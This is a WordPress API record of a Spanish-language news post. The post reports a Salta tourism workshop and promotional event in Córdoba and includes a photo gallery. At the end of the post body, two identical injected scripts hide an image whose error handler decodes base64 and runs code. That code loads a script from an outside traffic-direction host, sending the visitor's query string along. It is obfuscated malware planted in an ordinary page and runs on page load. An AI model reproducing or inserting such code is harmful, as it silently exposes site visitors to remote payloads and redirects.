{"id":1355,"date":"2022-08-24T14:59:49","date_gmt":"2022-08-24T17:59:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1355"},"modified":"2025-08-14T00:37:36","modified_gmt":"2025-08-14T03:37:36","slug":"salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1355","title":{"rendered":"Salta refuerza presencia en el mercado tur\u00edstico de C\u00f3rdoba"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#c20a38\">En un workshop el sector privado de Salta comercializ\u00f3 su oferta con su contraparte de C\u00f3rdoba. El Ministerio tuvo presencia de promoci\u00f3n al consumidor final.<\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes junto a la C\u00e1mara de Turismo de Salta realiz\u00f3 en la ciudad de C\u00f3rdoba un workshop y acciones de promoci\u00f3n al consumidor final con el objetivo de reforzar la presencia del destino en este mercado estrat\u00e9gico nacional.<\/p>\n\n\n\n<p>Ayer comenz\u00f3 la presencia de Salta en el Buen Pastor donde la oferta tur\u00edstica de la provincia estuvo presente en este tradicional paseo de la capital cordobesa.<\/p>\n\n\n\n<p>Hoy se desarroll\u00f3 la ronda de negocios entre el sector privado de Salta y el de C\u00f3rdoba con buenos niveles de comercializaci\u00f3n e intercambio.<\/p>\n\n\n\n<p>La subsecretaria de Promoci\u00f3n Tur\u00edstica de Salta, Laura Alcorta, destac\u00f3 que la comitiva salte\u00f1a estuvo integrada por m\u00e1s de 50 personas del sector p\u00fablico y privado quienes, tanto en acciones de promoci\u00f3n al consumidor final como de interacci\u00f3n comercial, mostraron la diversidad de destinos y productos que la provincia tiene para ofrecer.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3847-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3847-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg\" alt=\"Salta refuerza presencia en el mercado tur\u00edstico de C\u00f3rdoba\"\/><\/a><\/figure>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo de Salta Gustavo Di M\u00e9cola agradeci\u00f3 al sector privado de C\u00f3rdoba por estar presente en la ronda de negocios y destac\u00f3 la continuidad del trabajo entre el Ministerio de Turismo y el sector privado.<\/p>\n\n\n\n<p>Estuvieron presentes representantes de empresas salte\u00f1as, los municipios Salta y San Lorenzo, c\u00e1maras de turismos del interior, con una destacada participaci\u00f3n en el workshop de El Tren a las Nubes y del Hotel Termas de Rosario de la Frontera.<\/p>\n\n\n\n<p>Participaron el director de la Agencia C\u00f3rdoba Turismo, Gustavo Peralta, el director general de Promoci\u00f3n de la ciudad de C\u00f3rdoba, Francisco Marchiaro y referentes de asociaciones tur\u00edstica de la provincia de C\u00f3rdoba.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"1356\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1307-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg\" alt=\"\" class=\"wp-image-1356\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1358\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1308-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg\" alt=\"\" class=\"wp-image-1358\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1308-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1308-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1308-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1308-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1308-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1357\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1309-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg\" alt=\"\" class=\"wp-image-1357\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1309-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1309-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1309-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1309-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1309-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1359\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1311-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg\" alt=\"\" class=\"wp-image-1359\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1311-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1311-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1311-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1311-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1311-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1361\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1312-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg\" alt=\"\" class=\"wp-image-1361\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1312-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1312-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1312-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1312-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1312-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1360\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1313-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg\" alt=\"\" class=\"wp-image-1360\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1313-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1313-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1313-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1313-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1313-salta-refuerza-presencia-en-el-mercado-turistico-de-cordoba-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En un workshop el sector privado de Salta comercializ\u00f3 su oferta con su contraparte de C\u00f3rdoba. El Ministerio tuvo presencia de promoci\u00f3n al consumidor final. El Ministerio de Turismo y Deportes junto a la C\u00e1mara de Turismo de Salta realiz\u00f3 en la ciudad de C\u00f3rdoba un workshop y acciones de promoci\u00f3n al consumidor final con [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1362,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-1355","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1355"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1355"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1355\/revisions"}],"predecessor-version":[{"id":7381,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1355\/revisions\/7381"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1362"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1355"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1355"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1355"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}